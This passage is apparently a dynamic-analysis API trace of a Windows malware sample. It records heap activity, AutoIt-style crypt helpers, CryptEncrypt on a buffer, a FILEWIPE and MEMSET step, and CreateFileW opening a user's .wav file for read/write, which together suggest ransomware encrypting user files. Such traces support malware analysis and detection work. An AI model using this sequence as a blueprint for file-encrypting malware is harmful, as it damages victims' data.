dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.453] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.455] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.455] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.455] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.455] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.455] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.456] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.456] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.456] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.456] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.456] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.456] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.456] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.456] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.456] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.456] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.456] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.456] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.457] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.457] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.457] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x10944, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x10950) returned 1 [0038.457] CharLowerBuffW (in: lpsz="byte[67921]", cchLength=0xb | out: lpsz="byte[67921]") returned 0xb [0038.458] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.459] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x945958*, pdwDataLen=0x6ae220*=0x10944, dwBufLen=0x10950 | out: pbData=0x945958*, pdwDataLen=0x6ae220*=0x10950) returned 1 [0038.459] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.467] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.467] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0038.467] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.467] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.467] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.467] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0038.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.468] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.468] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0038.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.468] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0038.469] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.469] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939c98a0, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xb4f60e50, ftLastAccessTime.dwHighDateTime=0x1d5bae1, ftLastWriteTime.dwLowDateTime=0xb4f60e50, ftLastWriteTime.dwHighDateTime=0x1d5bae1, nFileSizeHigh=0x0, nFileSizeLow=0x10944, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SG2JCe2OU9yef2QQFr-.wav", cAlternateFileName="SG2JCE~1.WAV")) returned 0x7c2100 [0038.469] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.469] CharLowerBuffW (in: lpsz="byte[67908]", cchLength=0xb | out: lpsz="byte[67908]") returned 0xb [0038.469] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.469] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.469] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.469] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.470] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.471] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.471] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sg2jce2ou9yef2qqfr-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0038.471] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 